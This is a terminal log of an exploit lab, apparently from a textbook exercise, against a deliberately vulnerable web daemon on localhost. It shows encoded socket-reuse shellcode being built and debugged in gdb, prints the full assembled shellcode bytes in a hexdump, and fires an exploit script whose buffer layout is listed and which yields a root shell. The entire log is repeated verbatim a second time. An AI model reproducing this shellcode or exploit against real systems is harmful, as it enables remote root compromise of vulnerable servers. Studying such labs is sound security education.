root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..
[The second terminal — the one that fires the exploit at the daemon while it runs under gdb — is not shown here; it is the same as in the book. What follows is the first int3 stop inside the decoder: edx counts from 8 down to 0 and each pass subtracts 5 from the byte at [ebx+edx], turning the pushed "4gns4xm\x05" back into "/bin/sh\0" (compare the two x/8c dumps). Note that the loop touches 9 bytes (indexes 8..0) although only 8 were pushed; the extra byte at [ebx+8] lies past the terminating NUL, so the execve that follows (mov al,0xb; int 0x80 in the hexdump) never reads it.]
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push 0x8
0xbffff60d: pop edx
0xbffff60e: sub BYTE PTR [ebx+edx*1],0x5
0xbffff612: dec edx
0xbffff613: jns 0xbffff60e
0xbffff615: int3
0xbffff616: xor edx,edx
0xbffff618: push edx
0xbffff619: mov edx,esp
0xbffff61b: push ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
42c42
< int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j.X....t..l$hh..|
00000010 04 08 c3 8d 54 24 4c 8b 1a 6a 02 59 31 c0 b0 3f |....T$L..j.Y1..?|
00000020 cd 80 49 79 f9 b0 0b 68 34 78 6d 05 68 34 67 6e |..Iy...h4xm.h4gn|
00000030 73 89 e3 6a 08 5a 80 2c 13 05 4a 79 f9 31 d2 52 |s..j.Z.,..Jy.1.R|
00000040 89 e2 53 89 e1 cd 80 |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..
[The second terminal — the one that fires the exploit at the daemon while it runs under gdb — is not shown here; it is the same as in the book. What follows is the first int3 stop inside the decoder: edx counts from 8 down to 0 and each pass subtracts 5 from the byte at [ebx+edx], turning the pushed "4gns4xm\x05" back into "/bin/sh\0" (compare the two x/8c dumps). Note that the loop touches 9 bytes (indexes 8..0) although only 8 were pushed; the extra byte at [ebx+8] lies past the terminating NUL, so the execve that follows (mov al,0xb; int 0x80 in the hexdump) never reads it.]
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push 0x8
0xbffff60d: pop edx
0xbffff60e: sub BYTE PTR [ebx+edx*1],0x5
0xbffff612: dec edx
0xbffff613: jns 0xbffff60e
0xbffff615: int3
0xbffff616: xor edx,edx
0xbffff618: push edx
0xbffff619: mov edx,esp
0xbffff61b: push ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
42c42
< int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j.X....t..l$hh..|
00000010 04 08 c3 8d 54 24 4c 8b 1a 6a 02 59 31 c0 b0 3f |....T$L..j.Y1..?|
00000020 cd 80 49 79 f9 b0 0b 68 34 78 6d 05 68 34 67 6e |..Iy...h4xm.h4gn|
00000030 73 89 e3 6a 08 5a 80 2c 13 05 4a 79 f9 31 d2 52 |s..j.Z.,..Jy.1.R|
00000040 89 e2 53 89 e1 cd 80 |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root